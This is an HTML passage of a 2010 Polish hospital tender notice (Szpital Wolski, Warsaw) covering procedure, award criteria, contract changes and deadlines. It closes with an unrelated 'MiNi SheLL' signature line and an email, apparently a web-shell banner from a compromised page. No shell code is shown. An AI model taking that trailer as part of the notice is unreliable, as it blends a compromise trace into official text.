Wymaga się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty 
Harmonogram  rzeczowo - finansowy  zawierający podział realizacji przedmiotu umowy na poszczególne etapy robót i terminy ich realizacji wraz z wynagrodzeniem za te etapy
Dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany w umowie w stosunku do treści oferty zgodnie z art. 144 ust. 1. ustawy:
a) możliwość dokonania zmiany terminu zakończenia robót w wyniku wystąpienia robót nieprzewidzianych lub dodatkowych prowadzonych na obiekcie,
b) możliwość  dokonania zmiany wynagrodzenia w przypadku:
- zmiany  stawki podatku VAT,
- w przypadku konieczności zaniechania części zakresu przedmiotu umowy,
- w przypadku wystąpienia robót  zamiennych,
- w przypadku konieczności przerwania robót lub ograniczenia zakresu rzeczowego przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej,  01 - 211 Warszawa, ul. Kasprzaka 17 Pawilon nr 8 - Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2010 godzina 10:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej,  01 - 211 Warszawa, ul. Kasprzaka 17
Pawilon nr 2 -Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com